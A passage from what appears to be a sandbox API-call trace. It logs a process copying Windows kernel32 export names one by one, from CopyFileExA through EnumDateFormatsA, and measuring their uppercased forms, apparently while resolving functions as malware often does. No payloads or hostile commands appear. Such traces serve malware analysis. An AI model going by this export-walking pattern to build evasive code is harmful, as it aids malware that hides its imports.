out: lpString1="CopyFileExA") returned="CopyFileExA" [0051.688] lstrlenA (lpString="COPYFILEEXA") returned 11 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0051.688] lstrlenA (lpString="COPYFILEEXW") returned 11 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0051.688] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0051.688] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0051.688] lstrlenA (lpString="COPYFILEW") returned 9 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0051.688] lstrlenA (lpString="COPYLZFILE") returned 10 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0051.688] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0051.688] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0051.688] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0051.689] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0051.689] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0051.689] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0051.689] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0051.689] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0051.689] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0051.689] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0051.689] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0051.689] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0051.689] lstrlenA (lpString="CREATEEVENTA") returned 12 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0051.689] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0051.689] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0051.689] lstrlenA (lpString="CREATEEVENTW") returned 12 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0051.689] lstrlenA (lpString="CREATEFIBER") returned 11 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0051.689] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0051.689] lstrlenA (lpString="CREATEFILEA") returned 11 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0051.689] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0051.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0051.689] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0051.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0051.690] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0051.690] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0051.690] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0051.690] lstrlenA (lpString="CREATEFILEW") returned 11 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0051.690] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0051.690] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0051.690] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0051.690] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0051.690] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0051.690] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0051.690] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0051.690] lstrlenA (lpString="CREATEJOBSET") returned 12 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0051.690] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0051.690] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0051.690] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0051.690] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0051.690] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0051.690] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0051.690] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0051.690] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0051.691] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0051.691] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0051.691] lstrlenA (lpString="CREATEPIPE") returned 10 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0051.691] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0051.691] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0051.691] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0051.691] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0051.691] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0051.691] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0051.691] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0051.691] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0051.691] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0051.691] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0051.691] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0051.691] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0051.691] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0051.691] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0051.691] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0051.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0051.691] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0051.692] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0051.692] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0051.692] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0051.692] lstrlenA (lpString="CREATETHREAD") returned 12 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0051.692] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0051.692] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0051.692] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0051.692] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0051.692] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0051.692] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0051.692] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0051.692] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0051.692] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0051.692] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0051.692] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0051.692] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0051.692] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0051.692] lstrlenA (lpString="CTRLROUTINE") returned 11 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0051.692] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0051.692] lstrcpyA (in: lpString1=0xc9d428, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0051.693] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0051.693] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0051.693] lstrlenA (lpString="DEBUGBREAK") returned 10 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0051.693] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0051.693] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0051.693] lstrlenA (lpString="DECODEPOINTER") returned 13 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0051.693] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0051.693] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0051.693] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0051.693] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0051.693] lstrlenA (lpString="DELETEATOM") returned 10 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0051.693] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0051.693] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0051.693] lstrlenA (lpString="DELETEFIBER") returned 11 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0051.693] lstrlenA (lpString="DELETEFILEA") returned 11 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0051.693] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0051.693] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0051.693] lstrlenA (lpString="DELETEFILEW") returned 11 [0051.693] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0051.693] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0051.694] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0051.694] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0051.694] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0051.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0051.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0051.694] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0051.694] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0051.694] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0051.694] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0051.694] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0051.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0051.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0051.694] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0051.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0051.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0051.694] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0051.694] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0051.694] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0051.694] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0051.694] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0051.694] lstrcpyA (in: lpString1=0xc9d428, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0051.695] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0051.695] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0051.695] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0051.695] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0051.695] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0051.695] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0051.695] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0051.695] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0051.695] lstrcpyA (in: lpString1=0xc9d428, lpString2="EnumDateFormatsA" | out: 